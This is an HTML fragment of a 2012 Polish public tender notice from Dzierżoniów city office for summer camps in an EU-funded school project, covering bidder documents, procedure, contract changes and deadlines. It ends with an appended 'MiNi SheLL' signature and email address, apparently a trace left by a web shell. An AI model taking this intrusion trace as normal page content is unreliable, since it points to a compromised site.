<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy:
w zakresie terminu i wynagrodzenia:
a)	z powodu działania okoliczności siły wyższej, wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
b)	Strony zastrzegają sobie możliwość zmiany lokalizacji ośrodka wypoczynkowego, w którym organizowane są kolonie lenie ze względu na zaistnienia zdarzeń losowych, których nie można było przewidzieć na etapie składania ofert np.: pożar. W takim przypadku Wykonawca zobowiązany będzie do wskazania zmawiającemu innego Ośrodka wypoczynkowego spełniającego warunki określone w pkt. III SIWZ, który podlegał będzie pisemnej akceptacji Zamawiającego. 
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/pl/bip/zamowienia_publiczne/ogloszenia/powyzej_14/uslugi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2012 godzina 12:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt p.n.: KAŻDY MOŻE ZOSTAĆ OMNIBUSEM realizowany w ramach POKL Priorytet III Wysoka jakość systemu oświaty, Działanie 3.3 Poprawa, jakości kształcenia, Poddziałanie 3.3.4 Modernizacja treści i metod kształcenia - projekty konkursowe współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com